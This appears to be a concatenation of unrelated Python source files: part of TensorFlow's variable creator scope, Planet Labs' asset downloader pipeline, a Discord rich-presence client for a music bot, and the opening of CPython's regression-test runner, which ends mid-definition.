If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
downloader.py
|
# Copyright 2017 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import threading
import time
from .utils import write_to_file
from planet.api.exceptions import RequestCancelled
try:
import Queue as queue
except ImportError:
# renamed in 3
import queue
def _by_status(assets, types, status):
return [assets[t] for t in types if
t in assets and assets[t]['status'] == status]
def _all_status(assets, types, statuses):
return all([assets[t]['status'] in statuses for t in types if t in assets])
_logger = logging.getLogger(__name__)
_debug = _logger.debug
_info = _logger.info
class _Stage(object):
'''A _Stage performs some sequence in an activate/poll/download cycle.
The stage will first attempt to process any existing tasks and if there
is capacity, poll for another from the iterator-like source (a _Stage is
one, itself). If the response is False, this implies the source is
exhausted or cancelled. If the response is None, there are no pending
tasks from the source.
When a _Stage has completed a task, it places the output in _results so
they are available. If the task needs repeating, it is placed back in the
task queue.
A _Stage may perform a maximum number of do-per-seconds to avoid throttling
The current approach is conservative and does not issue RPS but instead
throttles if a request complets in under the allotted time.
The Downloader uses the following stages:
search-iter -> activation -> polling -> download
Downloader synchronously drains the download stage allowing for completion
and cancellation of any in-flight backgrounded requests.
Where search-iter is an iterator of 'item' features from the API.
This approach allows for back-pressure from constrained stages as well as
re-queueing tasks without being deadlock prone (e.g. pull vs. push) and
simplifies cancellation of the entire pipeline.
'''
def __init__(self, source, size=0, max_dps=0):
self._source = source
self._running = True
self._cancelled = False
self._size = size
self._tasks = []
# track the current task
self._doing = None
self._results = queue.Queue()
self._min_sleep = 1. / max_dps if max_dps else 0
self._cond = threading.Condition()
def work(self):
return len(self._tasks) + (1 if self._doing else 0)
def start(self):
threading.Thread(target=self._run).start()
def next(self):
try:
return self._results.get()
except queue.Empty:
if not self._alive():
return False
def _i(self, msg, *args):
_info(type(self).__name__ + ' : ' + msg, *args)
def _d(self, msg, *args):
_debug(type(self).__name__ + ' : ' + msg, *args)
def _cancel(self, result):
pass
def cancel(self):
# this makes us not alive
self._cancelled = True
self._running = False
self._tasks = []
self._doing = None
# drain any results and cancel them
while not self._results.empty():
self._results.get()
self._results.put(False)
# notify any sleepers
try:
self._cond.acquire()
self._cond.notify_all()
finally:
self._cond.release()
def _task(self, t):
return t
def _alive(self):
# alive means upstream source has pending stuff or neither upstream
# or this stage have been cancelled or we have some pending tasks
# in the case upstream is done, but we're not
return not self._cancelled and (
self._running or len(self._tasks) or self._doing
)
def _capacity(self):
return len(self._tasks) < self._size
def _get_tasks(self):
while self._capacity() and self._running:
try:
# @todo minor refactor
# bleh, next wants an iterator, not just a __next__
if hasattr(self._source, 'next'):
n = self._source.next()
else:
n = next(self._source)
except StopIteration:
n = False
# upstream is done if False
self._running = n is not False
if n:
n = self._task(n)
n and self._tasks.insert(0, n)
else:
break
def _process_task(self):
if self._tasks:
self._doing = self._tasks.pop(0)
try:
self._do(self._doing)
except Exception:
# @todo should cancel the entire process?
self._running = False
logging.exception('unexpected error in %s', self)
return
self._doing = None
def _run(self):
while self._alive():
self._get_tasks()
t = time.time()
self._process_task()
# note - this is conservative compared to timer invocation.
# allow _at most_ 1 'do' per min_sleep
wait = self._min_sleep - (time.time() - t)
if wait > 0 and not self._cancelled:
self._d('sleep for %.2f', wait)
# waiting on the condition allows interrupting sleep
self._cond.acquire()
self._cond.wait(wait)
self._cond.release()
# sentinel value to indicate we're done
self._results.put(False)
class _AStage(_Stage):
def __init__(self, source, client, asset_types):
_Stage.__init__(self, source, 100, max_dps=5)
self._client = client
self._asset_types = asset_types
def _do(self, item):
assets = self._client.get_assets(item).get()
if not any([t in assets for t in self._asset_types]):
_info('no desired assets in item, skipping')
return
inactive = _by_status(assets, self._asset_types, 'inactive')
if inactive:
# still need activation, try the first inactive
self._client.activate(inactive[0])
self._tasks.append(item)
return
if _all_status(assets, self._asset_types, ['activating', 'active']):
self._results.put((item, assets))
else:
# hmmm
status = [assets[t]['status'] for t in self._asset_types]
raise Exception('unexpected state %s' % status)
class _PStage(_Stage):
_min_poll_interval = 5
def __init__(self, source, client, asset_types):
_Stage.__init__(self, source, 100, max_dps=2)
self._client = client
self._asset_types = asset_types
def _task(self, t):
item, assets = t
now = time.time()
return item, assets, now, now
def _do(self, task):
item, assets, start, last = task
now = time.time()
# don't poll until min interval elapsed
if now - last > self._min_poll_interval:
assets = self._client.get_assets(item).get()
last = now
if _all_status(assets, self._asset_types, ['active']):
_debug('activation took %d', time.time() - start)
self._results.put((item, assets))
else:
self._tasks.append((item, assets, start, last))
class _DStage(_Stage):
def __init__(self, source, client, asset_types, dest):
# @todo max pool should reflect client workers
_Stage.__init__(self, source, 4, max_dps=2)
self._client = client
self._asset_types = asset_types
self._dest = dest
self._write_lock = threading.Lock()
self._written = 0
self._downloads = 0
def _task(self, t):
item, assets = t
for at in self._asset_types:
self._tasks.append((item, assets[at]))
def cancel(self):
while not self._results.empty():
try:
r = self._results.get(block=False)
if r:
item, asset, dl = r
dl.cancel()
except queue.Empty:
pass
_Stage.cancel(self)
def _write_tracker(self, item, asset):
def _tracker(**kw):
if 'skip' in kw:
self._i('skipping download of %s, already exists',
kw['skip'].name)
elif 'wrote' in kw:
with self._write_lock:
self._written += kw['wrote']
return _tracker
def _get_writer(self, item, asset):
return
def _do(self, task):
item, asset = task
writer = write_to_file(
self._dest, self._write_tracker(item, asset), overwrite=False)
self._downloads += 1
self._results.put((item, asset,
self._client.download(asset, writer)))
class Downloader(object):
'''A Downloader manages activation and download of Item Assets from the
Data API. A Downloader should only be processing one request to either
`activate` or `download` at a time. These functions are synchronous and
will return on completion. Completion of activation or download events
can be tracked by changing the `on_complete` method of the Downloader while
the `stats` function allows for polling of internal state.
'''
def shutdown(self):
'''Halt execution.'''
raise NotImplementedError()
def stats(self):
'''Retrieve internal state of the Downloader.
Returns a dict of state:
- paging: `bool` indicating that search results are being processed
- activating: `int` number of items in the inactive or activating state
- downloading: `int` number of items actively downloading
- downloaded: `string` representation of MB transferred
- complete: `int` number of completed downloads
- pending: `int` number of items awaiting download
'''
raise NotImplementedError()
def activate(self, items, asset_types):
'''Request activation of specified asset_types for the sequence of
items.
:param items: a sequence of Item representations.
:param asset_types list: list of asset-type (str)
'''
raise NotImplementedError()
def download(self, items, asset_types, dest):
'''Request activation and download of specified asset_types for the
sequence of items.
:param items: a sequence of Item representations.
:param asset_types list: list of asset-type (str)
:param dest str: Download destination directory, must exist.
'''
raise NotImplementedError()
def on_complete(self, item, asset, path=None):
'''Notification of processing an item's asset, invoked on completion of
`activate` or `download`.
:param item: The API representation of the item
:param asset: The API representation of the asset
:param path: If downloaded, the location of the downloaded asset,
otherwise None
'''
pass
class _Downloader(Downloader):
def __init__(self, client, **opts):
self._client = client
self._opts = opts
self._stages = []
self._completed = 0
self._waiting = None
def activate(self, items, asset_types):
return self._run(items, asset_types)
def download(self, items, asset_types, dest):
return self._run(items, asset_types, dest)
def _init(self, items, asset_types, dest):
client = self._client
astage = _AStage(items, client, asset_types)
pstage = _PStage(astage, client, asset_types)
self._stages = [
astage,
pstage
]
if dest:
dstage = _DStage(pstage, client, asset_types, dest)
self._stages.append(dstage)
self._dest = dest
# sneaky little hack to allow tests to inject options
self._apply_opts(vars())
self._completed = 0
def _run(self, items, asset_types, dest=None):
if self._stages:
raise Exception('already running')
self._init(items, asset_types, dest)
[s.start() for s in self._stages]
last = self._stages[-1]
while self._stages:
try:
n = last.next()
if n is False:
break
# this represents an activation completion, report
# each requested item/asset combo
# @todo hacky lack of internal structure in results
if len(n) == 2:
item, assets = n
for a in asset_types:
self.on_complete(item, assets[a])
# otherwise it is a download
else:
item, asset, self._waiting = n
try:
body = self._waiting.wait()
self._waiting = None
dl = os.path.join(self._dest, body.name)
self.on_complete(item, asset, dl)
except RequestCancelled:
pass
self._completed += 1
except StopIteration:
break
stats = self.stats()
self._stages = []
return stats
def _apply_opts(self, to):
opts = self._opts
opt = opts.pop('no_sleep', False)
if opt:
for s in self._stages:
s._min_sleep = 0
for k in opts:
v, a = k.split('_', 1)
t = to.get(v, None)
if t is None:
raise Exception('option not supported %s', k)
else:
setattr(t, a, opts[k])
def stats(self):
stats = {
'paging': False,
'activating': 0,
'pending': 0,
'complete': 0,
}
if len(self._stages) == 3:
stats['downloading'] = 0
stats['downloaded'] = '0.0MB'
if not self._stages:
return stats
astage, pstage = self._stages[:2]
dstage = None if len(self._stages) == 2 else self._stages[2]
if dstage is not None:
mb_written = '%.2fMB' % (dstage._written / 1.0e6)
stats['downloading'] = dstage._downloads - self._completed
stats['downloaded'] = mb_written
stats['paging'] = astage._running
stats['activating'] = astage.work() + pstage.work()
stats['pending'] = (dstage.work() if dstage else 0)
stats['complete'] = self._completed
return stats
def shutdown(self):
for s in self._stages:
s.cancel()
self._waiting and self._waiting.cancel()
self._stages = []
self._client.shutdown()
class _MosaicDownloadStage(_DStage):
def _task(self, t):
return t
def _do(self, task):
func = self._write_tracker(task, None)
writer = write_to_file(self._dest, func, overwrite=False)
self._downloads += 1
self._results.put((task, {'type': 'quad'},
self._client.download_quad(task, writer)))
class _MosaicDownloader(_Downloader):
def activate(self, items, asset_types):
pass
def _init(self, items, asset_types, dest):
client = self._client
dstage = _MosaicDownloadStage(items, client, asset_types, dest)
self._dest = dest
self._stages.append(dstage)
self._apply_opts(vars())
self._completed = 0
def stats(self):
stats = {
'paging': False,
'activating': 0,
'pending': 0,
'complete': 0,
'downloading': 0,
'downloaded': '0.0MB',
}
if not self._stages:
return stats
dstage = self._stages[0]
mb_written = '%.2fMB' % (dstage._written / float(1024**2))
stats['downloading'] = dstage._downloads - self._completed
stats['downloaded'] = mb_written
stats['pending'] = dstage.work()
stats['complete'] = self._completed
return stats
def create(client, mosaic=False, **kw):
'''Create a Downloader with the provided client.
:param mosaic bool: If True, the Downloader will fetch mosaic quads.
:returns: :py:Class:`planet.api.downloader.Downloader`
'''
if mosaic:
return _MosaicDownloader(client, **kw)
else:
return _Downloader(client, **kw)
|
rpc_client.py
|
import os
import websockets
import asyncio
import traceback
from discoIPC.ipc import DiscordIPC
import json
import time
import datetime
from traceback import print_exc
import threading
with open("config.json") as f:
config = json.load(f)
urls = list(set([u["url"] for u in config["data"]]))
rpc_clients = {}
langs = {}
for f in os.listdir("./langs"):
if not f.endswith(".json"):
continue
with open(f"./langs/{f}", encoding="utf-8") as file:
langs[f[:-5]] = json.load(file)
def get_thumb(url):
if "youtube.com" in url:
return ["yt", "Youtube"]
if "spotify.com" in url:
return ["spotify", "Spotify"]
if "soundcloud.com" in url:
return ["soundcloud", "Soundcloud"]
def fix_characters(text: str, limit=30):
if len(text) > limit:
return f"{text[:limit - 3]}..."
return text
class RpcTest:
def __init__(self, pipe=0):
self.rpc = {}
self.pipe = pipe
self.user_id = ""
self.user = ""
self.time = None
self.rpc_id = None
self.rpc_info = {}
self.delay = 7
self.clients = {}
self.loop = asyncio.get_event_loop()
self.lang = config["language"]
self.task = None
self.exiting = False
self.bot_ids = [d["bot_id"] for d in config["data"]]
def boot(self):
if not self.loop.is_running():
self.task = self.loop.run_until_complete(self.connect())
self.task = self.loop.run_forever()
else:
self.task = self.loop.create_task(self.connect())
async def destroy(self, bot_id: str):
self.time = None
try:
self.rpc[bot_id].disconnect()
except Exception:
pass
async def start(self):
await self.check_rpc()
for bot_id in self.bot_ids:
if not self.rpc[bot_id].connected:
try:
self.rpc[bot_id].connect()
except Exception:
await self.destroy(bot_id)
del rpc_clients[self.pipe]
self.task.cancel()
self.exiting = True
return
self.user_id = self.rpc[bot_id].data['data']['user']['id']
self.user = f"{self.rpc[bot_id].data['data']['user']['username']}#{self.rpc[bot_id].data['data']['user']['discriminator']}"
print(f"RPC conectado: {self.user} [{self.user_id}] pipe: {self.pipe} | Bot ID: {bot_id}]")
async def check_rpc(self):
if not self.rpc_id:
self.rpc_id = self.bot_ids[0]
for bot_id in self.bot_ids:
if self.rpc.get(bot_id):
continue
try:
try:
self.rpc[bot_id] = DiscordIPC(bot_id, pipe=self.pipe)
except:
traceback.print_exc()
del rpc_clients[self.pipe]
self.task.cancel()
self.exiting = True
except:
continue
async def teardown(self, bot_id):
self.user_id = ""
await self.check_rpc()
try:
self.rpc[bot_id].disconnect()
except Exception as e:
traceback.print_exc()
def get_lang(self, key: str) -> str:
try:
lang = langs[self.lang]
txt: str = lang.get(key)
if not txt:
txt = langs["en-us"].get(key)
except KeyError:
txt = langs["en-us"].get(key)
return txt
async def update(self, bot_id):
await self.check_rpc()
if not self.rpc.get(bot_id):
try:
await self.start()
except:
print_exc()
await self.teardown(bot_id)
return
if not self.rpc[bot_id].connected:
self.rpc[bot_id].connect()
if not self.time:
self.time = time.time()
payload = {
"assets": {
"large_image": "app"
},
"timestamps": {}
}
track = self.rpc_info[bot_id].pop("track", None)
info = self.rpc_info[bot_id].pop("info")
if info and track:
m = info["members"]
payload['assets']['large_text'] = self.get_lang("server") + f': {info["guild"]["name"]} | ' + self.get_lang("channel") + f': #{info["channel"]["name"]} | ' + self.get_lang("listeners") + f': {m}'
payload['details'] = track["title"]
if track["stream"]:
payload['assets']['small_image'] = "stream"
payload['assets']['small_text'] = self.get_lang("stream")
if not track["paused"]:
if not track["stream"]:
startTime = datetime.datetime.now(datetime.timezone.utc)
endtime = (datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(milliseconds=track["duration"] - track["position"]))
payload['timestamps']['end'] = int(endtime.timestamp())
payload['timestamps']['start'] = int(startTime.timestamp())
repeat = track.get('loop')
if repeat:
if isinstance(repeat, list):
repeat_string = f"{self.get_lang('loop_text')}: {repeat[0]}/{repeat[1]}."
elif isinstance(repeat, int):
repeat_string = f"{self.get_lang('loop_remaining')}: {repeat}"
else:
repeat_string = self.get_lang("loop_text")
payload['assets']['small_image'] = "loop"
payload['assets']['small_text'] = repeat_string
else:
source_ico = get_thumb(track.get("url"))
if source_ico:
payload['assets']['small_image'] = source_ico[0]
payload['assets']['small_text'] = source_ico[1]
else:
payload['timestamps']['start'] = time.time()
payload['assets']['small_image'] = "stream"
payload['assets']['small_text'] = "Stream"
else:
payload['assets']['small_image'] = "pause"
payload['assets']['small_text'] = self.get_lang("paused")
state = ""
buttons = []
if track:
if url := track.get("url"):
buttons.append({"label": self.get_lang("listen"), "url": url.replace("www.", "")})
state += f'{self.get_lang("author")}: {track["author"]}'
pl_url = track.get("playlist_url")
pl_name = track.get("playlist_name")
ab_url = track.get("album_url")
ab_name = track.get("album_name")
if not pl_url:
pl_url = "https://cdn.discordapp.com/attachments/480195401543188483/802406033493852201/unknown.png"
if pl_name and pl_url:
if 'youtube.com' in pl_url:
pl_url = "https://www.youtube.com/playlist?list=" + (pl_url.split('?list=' if '?list=' in pl_url else '&list='))[1]
pl_title = f"Playlist: {pl_name}"
if len(pl_title) > 30:
pl_title = pl_name
buttons.append({"label": fix_characters(pl_title), "url": pl_url.replace("www.", "")})
elif state and pl_name:
state += f' | {pl_name}'
elif pl_name:
state += f'{self.get_lang("playlist")}: {pl_name}'
elif ab_url:
ab_final = f'{self.get_lang("album")}: {ab_name}' if len(ab_name) < 21 else ab_name
buttons.append({"label": fix_characters(ab_final, 30), "url": ab_url.replace("www.", "")})
if not state:
state = " "
payload['state'] = state
if buttons:
payload["buttons"] = buttons
else:
self.rpc[bot_id].clear()
return
self.rpc[bot_id].update_activity(payload)
async def connect(self):
try:
await self.start()
except Exception as e:
if not isinstance(e, FileNotFoundError):
traceback.print_exc()
else:
self.task.cancel()
self.exiting = True
del rpc_clients[self.pipe]
return
if self.exiting:
return
for url in urls:
self.clients[url] = self.loop.create_task(self.connect_ws(url))
async def connect_ws(self, url):
if self.exiting:
return
try:
ws = await websockets.connect(url)
a = {"user_id": self.user_id}
await ws.send(json.dumps(a))
while True:
msg = await ws.recv()
try:
data = json.loads(msg)
except Exception:
traceback.print_exc()
continue
op = data.pop("op")
public = data.pop("public", True)
bot_id = str(data.get("bot_id"))
print(f"op: {op} | {self.user} [{self.user_id}] | bot: {bot_id}")
match op:
case "update":
self.rpc_info[bot_id] = data
await self.update(bot_id)
case "idle":
try:
self.rpc_info[bot_id].clear()
except KeyError:
await self.check_rpc()
text_idle = self.get_lang("idle")
data = {
"assets": {
"large_image": "app"
},
"details": text_idle[0],
}
if len(text_idle) > 1:
data['state'] = text_idle[1]
if public:
invite = f"https://discord.com/api/oauth2/authorize?client_id={bot_id}&permissions=8&scope=bot%20applications.commands"
data["buttons"] = [
{
"label": self.get_lang("invite"),
"url": invite
}
]
try:
m = data["info"]["members"]
data['assets']['large_text'] = self.get_lang("server") + f': {data["info"]["guild"]["name"]} | ' + \
self.get_lang("channel") + f': #{data["info"]["channel"]["name"]} | ' + \
self.get_lang("listeners") + f': {m}'
except KeyError:
pass
self.rpc_info[bot_id] = data
self.rpc[bot_id].update_activity(data)
case "close":
try:
self.rpc[bot_id].clear()
except KeyError:
pass
self.rpc_info[bot_id] = {}
case _:
print(f"unknow op: {msg.data}")
except websockets.ConnectionClosed as e:
print(f'Conexão perdida com o servidor: {url} | Erro: {e.code} {e.reason}')
for d in config["data"]:
if d["url"] == url and d["bot_id"] in self.bot_ids:
self.rpc_info[d["bot_id"]].clear()
try:
self.rpc[d["bot_id"]].clear()
except:
continue
if e.code == 1006:
print(f"tentando novamente em {rpc.delay} segundos")
await asyncio.sleep(self.delay)
self.delay *= 2
await self.connect()
except Exception as e:
if not isinstance(e, ConnectionRefusedError):
print(f"Fatal Error Type 1: {type(e)} url: {url}")
traceback.print_exc()
#try:
# self.clients[url].cancel()
#except:
# pass
#del self.clients[url]
#if not self.clients:
# self.loop.close()
await asyncio.sleep(self.delay)
self.delay *= 2
for i in range(9):
rpc = RpcTest(i)
def start_rpc():
try:
rpc.boot()
rpc_clients[i] = rpc
except Exception as e:
print(f"Fatal Error Type 3: {type(e)}")
traceback.print_exc()
del rpc_clients[i]
raise Exception
try:
threading.Thread(target=start_rpc).start()
except (Exception, FileNotFoundError):
continue
while rpc_clients:
time.sleep(15)
|
regrtest.py
|
#! /usr/bin/env python3
"""
Script to run Python regression tests.
Run this script with -h or --help for documentation.
"""
USAGE = """\
python -m test [options] [test_name1 [test_name2 ...]]
python path/to/Lib/test/regrtest.py [options] [test_name1 [test_name2 ...]]
"""
DESCRIPTION = """\
Run Python regression tests.
If no arguments or options are provided, finds all files matching
the pattern "test_*" in the Lib/test subdirectory and runs
them in alphabetical order (but see -M and -u, below, for exceptions).
For more rigorous testing, it is useful to use the following
command line:
python -E -Wd -m test [options] [test_name1 ...]
"""
EPILOG = """\
Additional option details:
-r randomizes test execution order. You can use --randseed=int to provide a
int seed value for the randomizer; this is useful for reproducing troublesome
test orders.
-s On the first invocation of regrtest using -s, the first test file found
or the first test file given on the command line is run, and the name of
the next test is recorded in a file named pynexttest. If run from the
Python build directory, pynexttest is located in the 'build' subdirectory,
otherwise it is located in tempfile.gettempdir(). On subsequent runs,
the test in pynexttest is run, and the next test is written to pynexttest.
When the last test has been run, pynexttest is deleted. In this way it
is possible to single step through the test files. This is useful when
doing memory analysis on the Python interpreter, which process tends to
consume too many resources to run the full regression test non-stop.
-S is used to continue running tests after an aborted run. It will
maintain the order a standard run (ie, this assumes -r is not used).
This is useful after the tests have prematurely stopped for some external
reason and you want to start running from where you left off rather
than starting from the beginning.
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), and the minimal invocation is '-R :'.
-M runs tests that require an exorbitant amount of memory. These tests
typically try to ascertain containers keep working when containing more than
2 billion objects, which only works on 64-bit systems. There are also some
tests that try to exhaust the address space of the process, which only makes
sense on 32-bit systems with at least 2Gb of memory. The passed-in memlimit,
which is a string in the form of '2.5Gb', determines howmuch memory the
tests will limit themselves to (but they may go slightly over.) The number
shouldn't be more memory than the machine has (including swap memory). You
should also keep in mind that swap memory is generally much, much slower
than RAM, and setting memlimit to all available RAM or higher will heavily
tax the machine. On the other hand, it is no use running these tests with a
limit of less than 2.5Gb, and many require more than 20Gb. Tests that expect
to use more than memlimit memory will be skipped. The big-memory tests
generally run very, very long.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
none - Disable all special resources (this is the default).
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some test that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resource, e.g. testing SSL support for sockets.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
cpu - Used for certain CPU-heavy tests.
subprocess Run all tests for the subprocess module.
urlfetch - It is okay to download files required on testing.
gui - Run tests that require a running GUI.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the gui tests, give the
option '-uall,-gui'.
"""
# We import importlib *ASAP* in order to test #15386
import importlib
import argparse
import builtins
import faulthandler
import io
import json
import locale
import logging
import os
import platform
import random
import re
import shutil
import signal
import sys
import sysconfig
import tempfile
import time
import traceback
import unittest
import warnings
from inspect import isabstract
try:
import threading
except ImportError:
threading = None
try:
import _multiprocessing, multiprocessing.process
except ImportError:
multiprocessing = None
# Some times __path__ and __file__ are not absolute (e.g. while running from
# Lib/) and, if we change the CWD to run the tests in a temporary dir, some
# imports might fail. This affects only the modules imported before os.chdir().
# These modules are searched first in sys.path[0] (so '' -- the CWD) and if
# they are found in the CWD their __file__ and __path__ will be relative (this
# happens before the chdir). All the modules imported after the chdir, are
# not found in the CWD, and since the other paths in sys.path[1:] are absolute
# (site.py absolutize them), the __file__ and __path__ will be absolute too.
# Therefore it is necessary to absolutize manually the __file__ and __path__ of
# the packages to prevent later imports to fail when the CWD is different.
for module in sys.modules.values():
if hasattr(module, '__path__'):
module.__path__ = [os.path.abspath(path) for path in module.__path__]
if hasattr(module, '__file__'):
module.__file__ = os.path.abspath(module.__file__)
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048.
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
try:
import resource
except ImportError:
pass
else:
soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
newsoft = min(hard, max(soft, 1024*2048))
resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
# Test result constants.
PASSED = 1
FAILED = 0
ENV_CHANGED = -1
SKIPPED = -2
RESOURCE_DENIED = -3
INTERRUPTED = -4
CHILD_ERROR = -5 # error in a child process
from test import support
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network',
'decimal', 'cpu', 'subprocess', 'urlfetch', 'gui')
# When tests are run from the Python build directory, it is best practice
# to keep the test files in a subfolder. This eases the cleanup of leftover
# files using the "make distclean" command.
if sysconfig.is_python_build():
TEMPDIR = os.path.join(sysconfig.get_config_var('srcdir'), 'build')
else:
TEMPDIR = tempfile.gettempdir()
TEMPDIR = os.path.abspath(TEMPDIR)
class _ArgParser(argparse.ArgumentParser):
def error(self, message):
super().error(message + "\nPass -h or --help for complete help.")
def _create_parser():
# Set prog to prevent the uninformative "__main__.py" from displaying in
# error messages when using "python -m test ...".
parser = _ArgParser(prog='regrtest.py',
usage=USAGE,
description=DESCRIPTION,
epilog=EPILOG,
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter)
# Arguments with this clause added to its help are described further in
# the epilog's "Additional option details" section.
more_details = ' See the section at bottom for more details.'
group = parser.add_argument_group('General options')
# We add help explicitly to control what argument group it renders under.
group.add_argument('-h', '--help', action='help',
help='show this help message and exit')
group.add_argument('--timeout', metavar='TIMEOUT', type=float,
help='dump the traceback and exit if a test takes '
'more than TIMEOUT seconds; disabled if TIMEOUT '
'is negative or equals to zero')
group.add_argument('--wait', action='store_true',
help='wait for user input, e.g., allow a debugger '
'to be attached')
group.add_argument('--slaveargs', metavar='ARGS')
group.add_argument('-S', '--start', metavar='START',
help='the name of the test at which to start.' +
more_details)
group = parser.add_argument_group('Verbosity')
group.add_argument('-v', '--verbose', action='count',
help='run tests in verbose mode with output to stdout')
group.add_argument('-w', '--verbose2', action='store_true',
help='re-run failed tests in verbose mode')
group.add_argument('-W', '--verbose3', action='store_true',
help='display test output on failure')
group.add_argument('-q', '--quiet', action='store_true',
help='no output unless one or more tests fail')
group.add_argument('-o', '--slow', action='store_true', dest='print_slow',
help='print the slowest 10 tests')
group.add_argument('--header', action='store_true',
help='print header with interpreter info')
group = parser.add_argument_group('Selecting tests')
group.add_argument('-r', '--randomize', action='store_true',
help='randomize test execution order.' + more_details)
group.add_argument('--randseed', metavar='SEED',
dest='random_seed', type=int,
help='pass a random seed to reproduce a previous '
'random run')
group.add_argument('-f', '--fromfile', metavar='FILE',
help='read names of tests to run from a file.' +
more_details)
group.add_argument('-x', '--exclude', action='store_true',
help='arguments are tests to *exclude*')
group.add_argument('-s', '--single', action='store_true',
help='single step through a set of tests.' +
more_details)
group.add_argument('-m', '--match', metavar='PAT',
dest='match_tests',
help='match test cases and methods with glob pattern PAT')
group.add_argument('-G', '--failfast', action='store_true',
help='fail as soon as a test fails (only with -v or -W)')
group.add_argument('-u', '--use', metavar='RES1,RES2,...',
action='append', type=resources_list,
help='specify which special resource intensive tests '
'to run.' + more_details)
group.add_argument('-M', '--memlimit', metavar='LIMIT',
help='run very large memory-consuming tests.' +
more_details)
group.add_argument('--testdir', metavar='DIR',
type=relative_filename,
help='execute test files in the specified directory '
'(instead of the Python stdlib test suite)')
group = parser.add_argument_group('Special runs')
group.add_argument('-l', '--findleaks', action='store_true',
help='if GC is available detect tests that leak memory')
group.add_argument('-L', '--runleaks', action='store_true',
help='run the leaks(1) command just before exit.' +
more_details)
group.add_argument('-R', '--huntrleaks', metavar='RUNCOUNTS',
type=huntrleaks,
help='search for reference leaks (needs debug build, '
'very slow).' + more_details)
group.add_argument('-j', '--multiprocess', metavar='PROCESSES',
dest='use_mp', type=int,
help='run PROCESSES processes at once')
group.add_argument('-T', '--coverage', action='store_true',
dest='trace',
help='turn on code coverage tracing using the trace '
